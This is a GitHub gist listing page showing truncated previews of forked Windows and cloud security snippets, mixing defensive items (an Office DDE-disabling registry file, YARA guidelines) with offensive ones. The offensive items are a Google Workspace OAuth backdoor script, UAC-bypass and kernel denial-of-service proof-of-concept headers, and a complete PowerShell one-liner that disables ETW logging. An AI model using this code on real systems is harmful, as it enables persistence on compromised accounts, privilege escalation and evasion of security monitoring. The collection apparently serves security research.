Skip to content

Instantly share code, notes, and snippets.

View gavz's full-sized avatar

gavz

81 followers · 38 following
View GitHub Profile
@gavz
gavz / disable_ddeauto.reg
Created October 21, 2017 04:51 — forked from wdormann/disable_ddeauto.reg
Disable DDEAUTO for Outlook, Word, OneNote, and Excel versions 2010, 2013, 2016
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Options]
"DontUpdateLinks"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Word\Options]
"DontUpdateLinks"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Options]
"DontUpdateLinks"=dword:00000001
@gavz
gavz / GetWinCertificateHash.ps1
Created October 25, 2017 09:26 — forked from mattifestation/GetWinCertificateHash.ps1
A helper function to calculate the SHA256 hash of an Authenticode-signed PE WIN_CERTIFICATE structure.
function Get-WinCertificateHash {
<#
.SYNOPSIS
Calculates the SHA256 hash of the WIN_CERTIFICATE structure of an Authenticode-signed PE file
.DESCRIPTION
Get-WinCertificateHash calculates the SHA256 hash of the WIN_CERTIFICATE structure of an Authenticode-signed PE file. I wrote this function to attempt to identify the exact file that the BadRabbit signature was stolen from.
@gavz
gavz / gsuite_backdoor.py
Created November 1, 2017 19:45 — forked from ustayready/gsuite_backdoor.py
Quickly create a full-access backdoor on Google accounts by creating a Google API project at https://cloud.google.com/console, save the client_secrets.json into the same folder and then run the script below. It will print a URL for you to access with a browser that has the compromised Google account session active so you can authorize the applic…
#!/usr/bin/env python
import os
from oauth2client import client, tools
from oauth2client.file import Storage
SCOPES = 'https://www.googleapis.com/auth/calendar https://mail.google.com/ https://www.googleapis.com/auth/drive https://www.googleapis.com/auth/groups https://www.googleapis.com/auth/admin.directory.user'
def get_credentials():
credential_dir =os.getcwd()
client_secret_path = os.path.join(credential_dir, 'client_secrets.json')
@gavz
gavz / akagi_42b.c
Created November 8, 2017 14:42 — forked from hfiref0x/akagi_42b.c
UAC bypass using FwCplLua COM interface and HKCU mscfile registry entry hijack
typedef interface IFwCplLua IFwCplLua;
typedef struct IFwCplLuaInterfaceVtbl {
BEGIN_INTERFACE
HRESULT(STDMETHODCALLTYPE *QueryInterface)(
__RPC__in IFwCplLua * This,
__RPC__in REFIID riid,
_COM_Outptr_ void **ppvObject);
@gavz
gavz / DefText.c
Created November 8, 2017 18:17 — forked from taviso/DefText.c
NtUserDefSetText() in Windows 10 will panic if you set the ansi flag incorrectly.
#include <windows.h>
#include <winternl.h>
#include <stdio.h>
#pragma comment(lib, "user32")
#pragma comment(lib, "gdi32")
typedef struct _LARGE_STRING {
ULONG Length;
ULONG MaximumLength:31;
@gavz
gavz / KillETW.ps1
Created November 16, 2017 22:25 — forked from tandasat/KillETW.ps1
Disable ETW of the current PowerShell session
#
# This PowerShell command sets 0 to System.Management.Automation.Tracing.PSEtwLogProvider etwProvider.m_enabled
# which effectively disables Suspicious ScriptBlock Logging etc. Note that this command itself does not attempt
# to bypass Suspicious ScriptBlock Logging for readability.
#
[Reflection.Assembly]::LoadWithPartialName('System.Core').GetType('System.Diagnostics.Eventing.EventProvider').GetField('m_enabled','NonPublic,Instance').SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider','NonPublic,Static').GetValue($null),0)
@gavz
gavz / NtUserOpenDesktop.c
Created November 29, 2017 15:11 — forked from hfiref0x/NtUserOpenDesktop.c
Win32k NtUserOpenDesktop Denial Of Service (9200-17046)
/*
Win32k NtUserOpenDesktop->OpenDesktop Denial Of Service feature.
Working range: x64 Windows 8 (9200) up to Windows 10 RS4 (17046).
x86 versions not tested.
Feature:
@gavz
gavz / get-windows-api.ipynb
Created November 29, 2017 20:08 — forked from williballenthin/get-windows-api.ipynb
Extract the exported symbols from a typical Windows installation
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
@gavz
gavz / yara_performance_guidelines.md
Created November 30, 2017 18:38 — forked from Neo23x0/yara_performance_guidelines.md
YARA Performance Guidelines

YARA Performance Guidelines

When creating your rules for YARA keep in mind the following guidelines in order to get the best performance from them. This guide is based on ideas and recommendations by Victor M. Alvarez and WXS.

  • Revision 1.1, February 2016, applies to all YARA version 3.3+

Global Rules

Global rules are evaluated first. Only if they are satisfied non-global rules are evaluated. This may be useful if all samples exhibit the same characteristics. Use them combined with the "private" statement to suppress a match notification on the global rules.